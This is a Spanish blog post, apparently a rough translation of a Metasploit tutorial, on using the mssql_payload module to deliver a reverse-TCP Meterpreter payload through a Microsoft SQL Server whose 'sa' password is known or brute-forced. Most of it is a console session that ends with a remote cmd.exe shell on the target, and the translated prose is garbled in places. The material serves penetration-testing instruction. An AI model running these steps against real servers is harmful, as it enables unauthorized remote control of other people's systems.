jueves, 6 de mayo de 2010

Payloads a través de MSSQL

En la sección anterior que vio los fundamentos de crear un módulo, yo quería mostrarles este módulo para conseguir una comprensión de lo que estamos a punto de construir. Este módulo le permite entregar rápidamente las cargas útiles Metasploit base a través de servidores Microsoft SQL. El código actual funciona con 2000, 2005 y 2008. Estas secciones próximos primera le guiará a través de cómo usar este tipo de ataque, y empezar desde cero que en la reconstrucción de cómo fui capaz de escribir esta carga útil (y después de HDM limpiado mi código).

Primero vamos a echar un vistazo a cómo funciona el exploit. Si usted lee a través de la sección de vía rápida ya, usted se daría cuenta de que algo similar ocurre dentro de Fast-Track también. Cuando un administrador instala primero SQL Server 2000, 2005, o 2008, si se especifica la autenticación mixta o la autenticación basada en SQL, tienen que especificar una contraseña para la tristemente célebre "sa" cuenta. La cuenta "sa" es la cuenta de administrador de sistemas de servidores basados en SQL y tiene un montón de permisos en el propio sistema. Si de alguna forma puede adivinar la contraseña de "sa", a continuación, puede atacar a través de vectores de influencia Metasploit para realizar ataques adicionales. Si usted habló de algunos de los capítulos anteriores, hemos visto cómo a los servidores SQL descubrimiento a través del puerto UDP 1434, así como realizar ataques de diccionario bruta basada en la fuerza contra las direcciones IP con el fin de adivinar el SQL "sa" cuenta.

De aquí en adelante, vamos a suponer que usted ya sabe la contraseña para el servidor de MSSQL y que está listo para entregar su carga al sistema operativo subyacente y no el uso de vía rápida.

Vamos a lanzar el ataque:

____________
< metasploit ------------
\ ,__,
\ (oo)____
(__) )\
||--|| *

=[ metasploit v3.4-dev [core:3.4 api:1.0]
+ -- --=[ 453 exploits - 218 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
=[ svn r7690 updated today (2009.12.04)

msf > use windows/mssql/mssql_payload
msf exploit(mssql_payload) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST 10.10.1.103
LHOST => 10.10.1.103
msf exploit(mssql_payload) > set RHOST 172.16.153.129
RHOST => 172.16.153.129
msf exploit(mssql_payload) > set LPORT 8080
LPORT => 8080
msf exploit(mssql_payload) > set MSSQL_PASS ihazpassword
MSSQL_PASS => ihazpassword
msf exploit(mssql_payload) > exploit

[*] Started reverse handler on port 8080
[*] Warning: This module will leave QiRYOlUK.exe in the SQL Server %TEMP% directory
[*] Writing the debug.com loader to the disk...
[*] Converting the debug script to an executable...
[*] Uploading the payload, please be patient...
[*] Converting the encoded payload...
[*] Executing the payload...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (10.10.1.103:8080 -> 10.10.1.103:47384)

meterpreter > execute -f cmd.exe -i
Process 3740 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>


Traducido por Progresive Death

No hay comentarios:

Publicar un comentario